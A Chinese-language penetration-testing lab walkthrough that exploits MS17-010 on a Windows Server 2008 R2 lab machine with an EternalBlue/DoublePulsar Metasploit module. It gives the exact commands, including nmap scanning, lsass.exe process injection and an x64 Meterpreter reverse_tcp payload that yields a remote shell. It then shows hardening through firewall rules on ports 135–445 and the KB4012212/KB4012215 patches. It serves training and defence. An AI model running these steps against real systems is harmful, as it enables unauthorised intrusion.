综合渗透测试-使用Eternalblue-Doublepulsar获取主机权限
第一步,打开网络拓扑,启动实验虚拟机,分别查看虚拟机IP地址:
Kali Linux
Windows 2008
第二步, 将Kali桌面上的文件Eternalblue-Doublepulsar-Metasploit-master.zip解压到当前目录,
解压后的文件内容如下
然后需要将解压出来的文件eterblue_doublepulsar.rb拷贝到metasploit存放exp的目录中,使用命令cp eterblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/,
检查/usr/share/metasploit-framework/modules/exploits/windows/smb/中文件是否复制成功。
第三步,将桌面下的Eternalblue-Doublepulsar-Metaspoit-master/文件夹移动到/root目录下并改名为Eternalblue-Doublepulsar-Metaspoit
再来查看一下/root目录下的文件
第四步,使用命令msfconsole打开metasploit渗透测试平台,然后使用命令use exploit/windows/smb/eternalblue_doublepulsar使用exploit模块
使用命令options查看这里的设置选项,检查哪些参数需要设置
由于前面我们已经提前将eternalblue的exploit目录复制到root目录下了,所以这里的DOUBLEPULSARPATH和ETERNALBLUEPATH两个选项无需设置。使用命令show targets来检查该利用模块支持的操作系统版本
此处列举出来的适用操作系统比Metasploit内置的MS-17010模块适用的操作系统数量更多
第五步,开始利用之前先进入靶机Windows Server 2008,打开控制面板中的Windows防火墙,找到允许程序或功能通过Windows防火墙
在允许的程序和功能中勾上Closed port 445 for SMB使防火墙放行445端口
第六步,使用命令nmap -sV -p445 172.16.1.200来探测目标信息
根据结果得知靶机445端口处于开放状态,操作系统为Windows Server 2008 R2,可以断定目标系统为64位的Windows Server 2008,因为2008 R2只有64位的版本,接下来对渗透机Kali Linux中的利用模块进行参数设置。
第七步,使用命令set RHOST 172.16.1.200设置目标的IP地址,然后使用命令set PROCESSINJECT lsass.exe设置注入进程,由于目标为64位的操作系统需要单独制定目标的系统架构为x64,使用命令set TARGETARCHITECTURE x64,最后使用命令set TARGET 7设置目标操作系统为Windows Server 2008 R2
最后使用命令run,执行此模块
发现提示向目标发送了错误架构的DLL文件,找到问题后我们来进行排错
第八步,由于我们攻击的目标为64位系统因此生成的DLL文件也必须为64位,使用命令set PAYLOAD windows/x64/meterpreter/reverse_tcp,并重新设置LHOST和LPORT参数,再次执行发现利用成功
第九步,使用命令shell进入靶机CMD命令终端,然后使用命令ipconfig查看IP地址
利用成功。
第十步,加固方式一,首先关闭135、137、139、445端口的网络访问权限,具体操作步骤如下:打开控制面板中的Windows防火墙,并保证当前防火墙为启动状态
打开高级设置,在“入站规则”中新建一条规则
本课程以445为例其他端口的操作方法一样,本地端口选择445
选择阻止连接
然后将该规则命名为“Stop 445”
依次类推设置Stop 135、Stop 137以及Stop 139如下所示
第十一步,再次对目标靶机漏洞进行利用,检验漏洞是否加固成功
发现漏洞利用失败。
第十二步,加固方式二,下载并更新补丁,及时修复漏洞。补丁文件就存放在C:\update目录中,共有两个分别为kb4012212和kb4012215
两个补丁都需要安装
安装过程省略,KB4012212
KB4012215
两个补丁安装完成后选择立即重新启动